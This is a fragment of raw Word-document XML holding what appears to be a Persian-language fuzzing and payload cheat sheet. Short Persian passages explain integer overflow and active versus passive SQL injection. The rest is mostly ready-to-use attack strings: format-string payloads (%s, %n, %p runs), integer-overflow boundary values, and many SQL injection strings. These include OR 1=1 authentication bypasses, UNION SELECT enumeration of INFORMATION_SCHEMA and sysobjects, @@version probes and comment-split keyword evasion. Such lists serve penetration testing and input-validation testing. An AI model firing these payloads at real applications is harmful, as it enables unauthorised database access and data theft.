      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657EB1E9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>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>s%s%s%s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A8E8B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%99999999999s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B62FB21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%08x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351A922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lastRenderedPageBreak/>
        <w:t xml:space="preserve">%%20d </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C4F64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%%20n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5761489B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%%20x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B89431D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%%20s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56948DE4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>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>s%s%s%s%s%s%s%s%s%s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56B0B5" w14:textId="1C14434A" w:rsidR="000932D8" w:rsidRP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>%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>p%p%p%p%p%p%p%p%p%p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %s x 129 %x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47205">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 257</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C5DD28" w14:textId="77777777" w:rsidR="000932D8" w:rsidRDefault="000932D8" w:rsidP="000932D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25C2135C" w14:textId="7532CB4A" w:rsidR="000932D8" w:rsidRPr="00B47205" w:rsidRDefault="00B47205" w:rsidP="00B47205">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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B47205"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  <w:t>INTEGER OVERFLOWS (INT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D835F" w14:textId="77777777" w:rsidR="000932D8" w:rsidRDefault="000932D8" w:rsidP="000932D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015589EA" w14:textId="5A403EE1" w:rsidR="000932D8" w:rsidRDefault="00B47205" w:rsidP="00B47205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>اشتباهات سرر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ز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عدد صح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ح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اتفاق م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افتد که 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قادر به حساب کردن برا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ا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نباشد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که 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عمل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ات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محاسبات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مقدار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بیشتری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حداکثر مقدار داده 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کمتر از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حداقل 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>مقدار آن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داشته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باشد. اگر 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مهاجم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بتواند کاری کند که برنامه اینطور به حافظه </w:t>
      </w:r>
      <w:r w:rsidR="00D1146B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>تخصیص داده شود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>، بر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نامه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به طور بالقوه برا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حمله سرر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ز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بافر</w:t>
      </w:r>
      <w:r w:rsidR="00D1146B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آس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ب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پذ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باشد.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AADF69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-1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17786DA6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B2082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0x100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB8BA2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0x1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A0963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0x3fffffff </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FDFD61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0x7ffffffe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC7F38E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0x7fffffff </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B6856D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0x80000000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597E7BD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0xfffffffe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C85709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0xffffffff </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBDB796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0x10000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998848A" w14:textId="2F38EA02" w:rsidR="000932D8" w:rsidRP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>0x100000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B217441" w14:textId="77777777" w:rsidR="000932D8" w:rsidRDefault="000932D8" w:rsidP="000932D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4D75C9EA" w14:textId="54EEBA15" w:rsidR="000932D8" w:rsidRPr="00D1146B" w:rsidRDefault="00D1146B" w:rsidP="00D1146B">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"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 w:rsidRPr="00D1146B"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  <w:t>SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFE9DA" w14:textId="3EC0A814" w:rsidR="000932D8" w:rsidRDefault="00D1146B" w:rsidP="005B4396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lastRenderedPageBreak/>
        <w:t>ا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حمله م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رو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لا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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ه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پا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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گاه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داده 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تأث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بگذارد و معمولا هنگام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که ورود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کاربر </w:t>
      </w:r>
      <w:r w:rsidR="005B4396">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>از نظر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D1146B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>SQL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ف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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>لتر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نشده </w:t>
      </w:r>
      <w:r w:rsidR="005B4396">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>باشد، رخ می دهد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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B33D9" w14:textId="24216CB0" w:rsidR="000932D8" w:rsidRDefault="005B4396" w:rsidP="005B4396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Injection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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B4396">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>SQL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بسته</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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به 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>در معرض اطلاعات پا</w:t>
      </w:r>
      <w:r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گاه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>قرار گرفتن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(غ</w:t>
      </w:r>
      <w:r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رفعال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) </w:t>
      </w:r>
      <w:r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تغ</w:t>
      </w:r>
      <w:r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اطلاعات پا</w:t>
      </w:r>
      <w:r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گاه</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> داده (فعال)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>به دو دسته ز</w:t>
      </w:r>
      <w:r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طبقه بندی می شود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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311FAB5" w14:textId="1E481644" w:rsidR="005B4396" w:rsidRPr="007F3F38" w:rsidRDefault="005B4396" w:rsidP="007F3F38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7F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive SQL Injection  </w:t>
      </w:r>
      <w:r w:rsidR="007F3F38" w:rsidRPr="005B4396">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(غ</w:t>
      </w:r>
      <w:r w:rsidR="007F3F38"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F3F38"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رفعال</w:t>
      </w:r>
      <w:r w:rsidR="007F3F38" w:rsidRPr="005B4396">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4110FC00" w14:textId="79F0C0CD" w:rsidR="000932D8" w:rsidRPr="007F3F38" w:rsidRDefault="005B4396" w:rsidP="007F3F38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7F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>Active SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(فعال)</w:t>
      </w:r>
      <w:r w:rsidR="007F3F3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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0629E" w14:textId="19A916AE" w:rsidR="000932D8" w:rsidRDefault="007F3F38" w:rsidP="000932D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کد های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تزر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F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ق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فعال </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>SQL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اثر مخرب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بر پا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F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>گاه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داده ز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F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ربنا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داشته باشد اگر با موفق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F3F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ت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 شود.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C29650" w14:textId="77777777" w:rsidR="007F3F38" w:rsidRDefault="007F3F38" w:rsidP="007F3F3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550D5D84" w14:textId="77777777" w:rsidR="007F3F38" w:rsidRDefault="007F3F38" w:rsidP="007F3F3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7AF42056" w14:textId="19DB225B" w:rsidR="000932D8" w:rsidRDefault="007F3F38" w:rsidP="007F3F38">
      <w:pPr>
        <w:bidi/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi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7F3F38"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  <w:t>PASSIVE SQL INJECTION (SQP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF6AA9" w14:textId="77777777" w:rsidR="007F3F38" w:rsidRPr="007F3F38" w:rsidRDefault="007F3F38" w:rsidP="007F3F38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0405CC34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'|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>|(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>elt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>(-3+5,bin(15),</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>ord</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">(10),hex(char(45)))) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A0775E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||6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C438329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'||'6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373A2D74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(||6) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2F190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1=1--  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70165E87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OR 1=1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CD285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'1'='1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF061D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; OR '1'='1' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751EF82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%22+or+isnull%281%2F0%29+%2F* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F848DBD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%27+OR+%277659%27%3D%277659 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61280F6F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%22+or+isnull%281%2F0%29+%2F* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FE7A7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%27+--+ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830C465" w14:textId="5A828D3B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1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D70FCEE" w14:textId="75548174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"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1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F736CD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1=1 /* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08F94E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1=1-- ' or 'a'='a " or "a"="a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057D5AE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">') or ('a'='a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66506923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Admin' </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>OR '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4532BE" w14:textId="69ADA5E8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'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1CEE2" w14:textId="18B85A40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) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E8D39" w14:textId="6D074B92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having</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB238A" w14:textId="7D737F9F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having</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3E7C1" w14:textId="11F36D6A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group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> having 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B94730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SELECT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> name FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>syscolumns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE id = (SELECT id FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE name = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>tablename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">')- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC6176C" w14:textId="659BEF14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1 in (select @@version)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FD0D2" w14:textId="55E3337B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union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> all select @@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083AE88D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'unusual' = 'unusual' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F9292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'something' = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>some'+'thing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FA257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'text' = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>N'text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDEDFEB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'something' like 'some%' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA2852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2 &gt; 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D98EA2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'text' &gt; 't' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530E03E2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'whatever' in ('whatever') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363FDD13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2 BETWEEN 1 and 3 ' or username like char(37); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB4B14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union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> select * from users where login = char(114,111,111,116); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77FD39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union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F3F38">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t xml:space="preserve"> select  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C1455" w14:textId="4030D612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Password:*/=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91522C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UNI/**/ON SEL/**/ECT </w:t>
      </w:r>
    </w:p>
